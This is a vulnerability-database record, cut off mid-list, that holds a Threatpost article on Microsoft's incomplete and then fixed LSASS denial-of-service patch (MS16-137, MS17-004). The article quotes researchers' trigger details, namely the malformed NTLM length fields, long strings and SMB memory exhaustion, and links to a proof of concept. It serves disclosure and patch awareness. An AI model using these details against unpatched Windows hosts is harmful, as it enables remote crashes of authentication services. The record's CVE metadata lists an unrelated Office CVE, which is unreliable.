DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "type": "threatpost", "bulletinFamily": "info", "title": "Second Try at LSASS Patch Addresses Vulnerability", "description": "Microsoft\u2019s second try at patching a vulnerability in a critical Windows process apparently is more successful than its first attempt.\n\nYesterday, as part of its monthly [Patch Tuesday release of security bulletins](<https://threatpost.com/microsoft-issues-record-low-number-of-patch-tuesday-bulletins/122999/>), Microsoft sent out an update that fixed a denial-of-service vulnerability in the Windows Local Security Authority Subsystem Service (LSASS). The update was in response to a private disclosure from researcher Nicolas Economou of Core Security, who reported that a patch released in November for the same bug was incomplete.\n\nCore Security confirmed to Threatpost this morning that it had tested the patch and that the issue was resolved.\n\nLSASS enforces Windows security policies around authentication and login verification. It\u2019s a critical process that cannot be terminated without consequences.\n\nYesterday\u2019s bulletin, [MS17-004](<https://technet.microsoft.com/en-us/library/security/MS17-004>), was rated important by Microsoft for Vista, Windows Server 2008 (and R2), and Windows 7. An attacker using a specially crafted authentication request could remotely cause an automatic system reboot. Microsoft said it changed the way LSASS handles such requests.\n\nThe original patch, released Nov. 8 in [MS16-137](<https://technet.microsoft.com/en-us/library/security/MS16-137>), was privately disclosed by researcher [Laurent Gaffie](<http://g-laurent.blogspot.com.ar/2016/11/ms16-137-lsass-remote-memory-corruption.html>), who said the bug affects all versions of Windows, from XP to Windows 10. Gaffie describe the bug in his original report:\n\n> \u201cThis vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.\n> \n> \u201cThis allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.\u201d\n\nGaffie said it was also possible that an attacker could leverage the crash for local privilege escalation; he published a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/LSASS>) once the first patch was distributed.\n\nCore Security\u2019s Economou, however, said he discovered that once he analyzed Gaffie\u2019s PoC that the vulnerability was misunderstood. In a [technical description](<https://www.coresecurity.com/blog/unpatched-lsass-remote-denial-service-ms16-137>) published today, Economou said the fix was improperly applied.\n\nEconomou said as well that the vulnerability can also be triggered in Windows 8 and 10. To do so, he said, an attacker would have try to exhaust memory in the LSASS service rather than use a \u201cgiant\u201d memory allocation that would fail in older versions of Windows.\n\n\u201cI had been able to confirm that this vulnerability can be triggered in Windows 7 and 2008 R2 by establishing several SMB connections and sending evil sizes with values like 0x1000000 (16 MB). The problem is that in the case of the latest Windows versions, it\u2019s not possible to use this kind of sizes, because as I said before, the limit is 64KB,\u201d Economou said. \u201cSo, the only way to trigger this vulnerability should be by producing a memory exhaustion in the LSASS service. It may be possible to do so by finding a controllable malloc in the LSASS authentication process, creating multiple connections and producing a memory exhaustion until the \u201cLsapAllocateLsaHeap\u201d function fails. Maybe, this memory exhaustion condition could be easily reached in local scenarios.\u201d\n\nThis incomplete patch left users exposed for two months. During that time, Microsoft said it was not aware of any public exploits targeting this flaw. The new patch has resolved the vulnerability, he said.\n\n\u201cIf we diff against the latest \u201clsasrv.dll\u201d version (v6.1.7601.23642), we can see that the vulnerability was fixed by changing the \u201cNegGetExpectedBufferLength\u201d function,\u201d Economou said. \u201cBasically, the same 64KB packet size check used by Windows 8.1 and Windows 10 was now added to the rest of the Windows versions.\u201d\n", "published": "2017-01-11T13:01:57", "modified": "2017-01-18T14:08:07", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/second-try-at-windows-lsass-patch-addresses-vulnerability/123015/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/microsoft-issues-record-low-number-of-patch-tuesday-bulletins/122999/", "https://technet.microsoft.com/en-us/library/security/MS17-004", "https://technet.microsoft.com/en-us/library/security/MS16-137", "http://g-laurent.blogspot.com.ar/2016/11/ms16-137-lsass-remote-memory-corruption.html", "https://github.com/lgandx/PoC/tree/master/LSASS", "https://www.coresecurity.com/blog/unpatched-lsass-remote-denial-service-ms16-137"], "cvelist": ["CVE-2016-7237", "CVE-2017-11882"], "lastseen": "2018-10-06T22:54:15", "viewCount": 10, "enchantments": {"score": {"value": 6.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009"]}, {"type": "cve", "idList": ["CVE-2016-7237", "CVE-2017-11882", "CVE-2017-11884"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "kaspersky", "idList": ["KLA10897", "KLA11139", "KLA11832"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/"]}, {"type": "mscve", "idList": ["MS:CVE-2016-7237", "MS:CVE-2017-11882"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB3198510", "KB4011262", "KB4011276", "KB4011604", "KB4011618"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS16-137.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310809093", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139700", "PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-94040"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:DADA9CB340C28F942D085928B22B103F", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", 